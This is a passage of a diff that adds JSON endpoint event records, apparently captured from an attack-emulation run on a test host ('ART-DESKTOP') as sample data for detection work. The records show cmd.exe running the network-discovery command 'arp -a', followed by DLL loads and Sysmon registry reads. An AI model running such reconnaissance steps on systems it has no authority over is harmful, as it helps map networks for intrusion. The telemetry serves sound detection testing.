"pid": 2008, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573232800000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B8115401}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2008, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573232770000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B8115401}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2008, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573232770000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B8115401}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + 
"image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2008, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573232770000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B8115401}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2008, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573232770000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B8115401}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2008, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573232770000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B8115401}" + }, + { + "command_line": "arp -a", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2080, + "ppid": 2008, + "process_name": "ARP.EXE", + "process_path": "C:\\Windows\\System32\\ARP.EXE", + "subtype": "create", + "timestamp": 131883573232890000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}", + "unique_ppid": "{42FC7E13-CBCB-5C05-0000-0010B8115401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2080, + "process_name": "ARP.EXE", + "process_path": "C:\\Windows\\System32\\ARP.EXE", + "timestamp": 131883573232770000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573232770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2080, + "process_name": "ARP.EXE", + "process_path": "C:\\Windows\\System32\\ARP.EXE", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2080, + "process_name": "ARP.EXE", + "process_path": "C:\\Windows\\System32\\ARP.EXE", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573232920000, + 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + 
"process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": 
"Disallowed", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ARP.EXE", + "image_path": "C:\\Windows\\System32\\ARP.EXE", + "pid": 2080, + "process_name": "ARP.EXE", + "process_path": "C:\\Windows\\System32\\ARP.EXE", + "timestamp": 131883573232770000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + 
"registry_value": "CTLs", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2080, + "process_name": "ARP.EXE", + "process_path": "C:\\Windows\\System32\\ARP.EXE", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2080, + "process_name": "ARP.EXE", + "process_path": "C:\\Windows\\System32\\ARP.EXE", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2080, + "process_name": "ARP.EXE", + "process_path": "C:\\Windows\\System32\\ARP.EXE", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 2080, + "process_name": "ARP.EXE", + "process_path": "C:\\Windows\\System32\\ARP.EXE", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 2080, + "process_name": "ARP.EXE", + "process_path": "C:\\Windows\\System32\\ARP.EXE", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573233080000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "snmpapi.dll", + "image_path": "C:\\Windows\\System32\\snmpapi.dll", + "pid": 2080, + "process_name": "ARP.EXE", + "process_path": "C:\\Windows\\System32\\ARP.EXE", + "timestamp": 131883573232920000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + 
"process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573233080000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573233080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": 